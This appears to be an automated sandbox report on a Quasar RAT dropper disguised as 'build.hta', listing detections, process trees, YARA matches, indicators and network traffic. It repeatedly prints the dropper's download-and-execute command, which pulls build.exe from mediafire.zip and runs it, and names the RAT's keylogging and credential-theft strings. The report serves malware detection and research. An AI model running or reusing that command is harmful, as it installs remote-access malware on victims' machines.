Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
build.hta

Overview

General Information

Sample name:build.hta
Analysis ID:1454170
MD5:81d631fdb7e6f1d8b2222355bdea0d92
SHA1:fc5a81c0b9df522b041caf2557f152514ccfcd5c
SHA256:d5647dd8dbd73ac01bad18aefafab4b7848861c12eaff129b37f65cfc940575d
Tags:hta
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Quasar RAT
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected Quasar RAT
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Curl Download And Execute Combination
Sigma detected: Suspicious MSHTA Child Process
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7456 cmdline: mshta.exe "C:\Users\user\Desktop\build.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 7600 cmdline: curl -L https://mediafire.zip/build.exe -o build.exe MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • build.exe (PID: 7720 cmdline: build.exe MD5: 05EECFC1820AB3273409323601A71F23)
        • csc.exe (PID: 8136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
{"Host:Port": "OuB3'!fy.", "InstallName": "0vRva!b|>", "MutexName": "`H]\"':q", "StartupKey": "}p(3k<Y?Zi1BM", "Tag": "UnW))[Q>", "ServerSignature": "[{+'*", "ServerCertificate": "@ETksT"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
    00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Quasarrat_e52df647unknownunknown
    • 0x3ea04:$a1: GetKeyloggerLogsResponse
    • 0x3e165:$a2: DoDownloadAndExecute
    • 0x50614:$a3: http://api.ipify.org/
    • 0x4e11d:$a4: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}
    • 0x4f46b:$a5: " /sc ONLOGON /tr "
    00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
    • 0x3df21:$s1: DoUploadAndExecute
    • 0x3e165:$s2: DoDownloadAndExecute
    • 0x3dce6:$s3: DoShellExecute
    • 0x3e11d:$s4: set_Processname
    • 0x5824:$op1: 04 1E FE 02 04 16 FE 01 60
    • 0x5748:$op2: 00 17 03 1F 20 17 19 15 28
    • 0x61ae:$op3: 00 04 03 69 91 1B 40
    • 0x69fe:$op3: 00 04 03 69 91 1B 40
    00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmpQuasardetect Remcos in memoryJPCERT/CC Incident Response Group
    • 0x4ee2a:$quasarstr1: [PRIVATE KEY LOCATION: "{0}"]
    • 0x4ea3e:$quasarstr2: User: {0}{3}Pass: {1}{3}Host: {2}
    • 0x33dc9:$class: Core.MouseKeyHook.WinApi
    00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
      Click to see the 9 entries
      SourceRuleDescriptionAuthorStrings
      5.2.build.exe.64179a.1.raw.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
        5.2.build.exe.64179a.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          5.2.build.exe.64179a.1.raw.unpackWindows_Trojan_Quasarrat_e52df647unknownunknown
          • 0x3ec04:$a1: GetKeyloggerLogsResponse
          • 0x3e365:$a2: DoDownloadAndExecute
          • 0x50814:$a3: http://api.ipify.org/
          • 0x4e31d:$a4: Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}
          • 0x4f66b:$a5: " /sc ONLOGON /tr "
          9.2.csc.exe.4800000.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
            9.2.csc.exe.4800000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              Click to see the 50 entries

              System Summary

              barindex
              Source: Process startedAuthor: Sreeman, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\build.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7456, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, ProcessId: 7524, ProcessName: cmd.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\build.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7456, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, ProcessId: 7524, ProcessName: cmd.exe
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\build.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7456, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe, ProcessId: 7524, ProcessName: cmd.exe
              Timestamp:06/09/24-01:26:38.405968
              SID:2036383
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 5.2.build.exe.64179a.1.raw.unpackMalware Configuration Extractor: Quasar {"Host:Port": "OuB3'!fy.", "InstallName": "0vRva!b|>", "MutexName": "`H]\"':q", "StartupKey": "}p(3k<Y?Zi1BM", "Tag": "UnW))[Q>", "ServerSignature": "[{+'*", "ServerCertificate": "@ETksT"}
              Source: C:\Users\user\Desktop\build.exeReversingLabs: Detection: 16%
              Source: C:\Users\user\Desktop\build.exeVirustotal: Detection: 19%Perma Link
              Source: Yara matchFile source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: build.exe PID: 7720, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 8136, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.5% probability

              Compliance

              barindex
              Source: C:\Users\user\Desktop\build.exeUnpacked PE file: 5.2.build.exe.1060000.2.unpack
              Source: unknownHTTPS traffic detected: 172.67.195.64:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: Binary string: D:\Sources\foobar2000-desktop-1.6.x\foobar2000\Release\foobar2000.pdb source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr

              Networking

              barindex
              Source: TrafficSnort IDS: 2036383 ET TROJAN Common RAT Connectivity Check Observed 192.168.2.4:49746 -> 208.95.112.1:80
              Source: Malware configuration extractorURLs: OuB3'!fy.
              Source: Yara matchFile source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE
              Source: global trafficTCP traffic: 192.168.2.4:49747 -> 64.42.179.59:62604
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
              Source: unknownDNS query: name: ip-api.com
              Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /build.exe HTTP/1.1Host: mediafire.zipUser-Agent: curl/7.83.1Accept: */*
              Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: mediafire.zip
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: roblox.airdns.org
              Source: build.exe, build.exe, 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: http://forums.foobar2000.org/
              Source: build.exe, build.exe, 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://freegeoip.net/xml/
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: http://help.foobar2000.org/
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: http://help.foobar2000.org/filesystem::g_get_canonical_pathfilesystem::g_list_directoryunpack://file
              Source: csc.exe, 00000009.00000002.2971577534.0000000006AAC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2971577534.0000000006A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
              Source: build.exe, build.exe, 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2971577534.0000000006A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
              Source: csc.exe, 00000009.00000002.2971577534.0000000006AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
              Source: build.exeString found in binary or memory: http://schemas.microsof
              Source: csc.exe, 00000009.00000002.2971577534.0000000006A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: http://wiki.hydrogenaudio.org/index.php?title=Replaygain
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: http://wiki.hydrogenaudio.org/index.php?title=ReplaygainSet
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: http://www.foobar2000.org/FAQ.html
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: http://www.foobar2000.org/FAQ.htmlCould
              Source: curl.exe, 00000004.00000002.1756910254.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, build.htaString found in binary or memory: https://mediafire.zip/build.exe
              Source: curl.exe, 00000004.00000002.1756723247.0000000002710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mediafire.zip/build.exe-obuild.exei
              Source: curl.exe, 00000004.00000003.1756384519.0000000002744000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1756502997.0000000002745000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1756850133.0000000002745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mediafire.zip/build.exem
              Source: curl.exe, 00000004.00000003.1756384519.0000000002744000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1756502997.0000000002745000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1756850133.0000000002745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mediafire.zip/build.exep
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: https://www.foobar2000.org/
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: https://www.foobar2000.org/download
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: https://www.foobar2000.org/downloadcomponent_manager::on_app_initPre
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: https://www.foobar2000.org/downloadportablestandardquietcrashednoguisafeinstallfoobar2000.exe:
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: https://www.foobar2000.org/license
              Source: build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drString found in binary or memory: https://www.foobar2000.org/licensehttps://www.foobar2000.org/http://forums.foobar2000.org/AboutOpens
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownHTTPS traffic detected: 172.67.195.64:443 -> 192.168.2.4:49733 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeJump to behavior

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: build.exe PID: 7720, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 8136, type: MEMORYSTR

              System Summary

              barindex
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Detects Patchwork malware Author: Florian Roth
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: QuasarRAT payload Author: ditekSHen
              Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
              Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
              Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Quasarrat_e52df647 Author: unknown
              Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_0041715A NtQueryDefaultLocale,5_2_0041715A
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_0041611C NtQueryDefaultLocale,5_2_0041611C
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00416C1C NtQueryDefaultLocale,5_2_00416C1C
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00417150 NtQueryDefaultLocale,5_2_00417150
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_004169D2 NtQueryDefaultLocale,5_2_004169D2
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_004175F9 NtQueryDefaultLocale,5_2_004175F9
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00417194 NtQueryDefaultLocale,5_2_00417194
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_004166E1 NtQueryDefaultLocale,5_2_004166E1
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00417344 NtQueryDefaultLocale,5_2_00417344
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00417331 NtQueryDefaultLocale,5_2_00417331
              Source: C:\Users\user\Desktop\build.exeCode function: 5_2_00416FFE NtQueryDefaultLocale,5_2_00416FFE
